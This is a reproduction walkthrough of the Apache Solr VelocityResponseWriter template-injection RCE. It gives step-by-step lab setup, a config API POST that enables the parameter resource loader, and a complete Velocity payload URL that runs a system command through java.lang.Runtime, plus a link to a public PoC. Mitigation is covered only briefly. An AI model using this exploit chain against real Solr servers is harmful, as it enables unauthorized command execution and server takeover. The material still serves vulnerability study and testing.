Example analysis of Apache Solr velocity template injection RCE vulnerability

0x01 Introduction

Solr is an enterprise-level independent search application server that can provide services to the outside world through the Web service API interface. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.

0x02 Vulnerability Introduction

The VelocityResponseWriter component exists in Solr. An attacker can construct a specific request to modify the relevant configuration so that the VelocityResponseWriter component allows Loading the specified template causes the Velocity template to inject a remote command execution vulnerability. An attacker can use this vulnerability to directly obtain server permissions.

0x03 Scope of impact

Apache Solr 5.x - 8.2.0, config API version

exists 0x04 Environment Construction

Install the java8 environment, and then download Solr, download address:

https://www.apache.org/dyn/closer.lua /lucene/solr/8.2.0/solr-8.2.0.zip

After downloading, decompress and enter the bin directory to execute./solr start

unzip solr-8.2.0.zip

Some warning messages will appear during startup. We can eliminate them by modifying the solr.in.sh file under bin and setting SOLR_ULIMIT_CHECKS to false

vim solr.in.sh

Then start again./solr start If root startup fails, add -force after it

Visit http://ip:8983 in the browser, and the following interface appears to indicate that the installation is successful

But it is found that the core cannot be created

We first manually install it in /server/solr Create a new_core folder in the / directory, then copy the conf directory under /server/solr/configsets/_default/ to the new_core directory, and then click Create

0x05 vulnerability recurrence

After creating the Core, visit to see if the application config file can be accessed

http://ip:8983/solr/new_core/config

Apache Solr integrates the VelocityResponseWriter plug-in by default. The default value of params.resource.loader.enabled in the plug-in initialization parameter is set to false. However, the integration settings can be directly modified through a POST request, setting it to true, and then You can construct special GET requests to achieve remote code execution.

Use Burp to grab the package of this page, construct a POST request directly, and add the following data

{

"update-queryresponsewriter": {

" startup": "lazy",

"name": "velocity",

"class": "solr.VelocityResponseWriter",

"template.base.dir" : "",

"solr.resource.loader.enabled": "true",

"params.resource.loader.enabled": "true"

}

}

Next we can construct the payload to implement RCE

payload:

http:// ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='') #set($rt=$x.class.forName('java.lang .Runtime')) #set($chr=$x.class.forName('java.lang.Character')) #set($str=$x.class.forName('java.lang.String')) # set($ex=$rt.getRuntime().exec('id')) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out .available()])$str.valueOf($chr.toChars($out.read()))#end

POC address: https://github. com/wyzxxz/Apache_Solr_RCE_via_Velocity_template

##0x06 Repair method

Update to the latest version

The above is the detailed content of Example analysis of Apache Solr velocity template injection RCE vulnerability. For more information, please follow other related articles on the PHP Chinese website!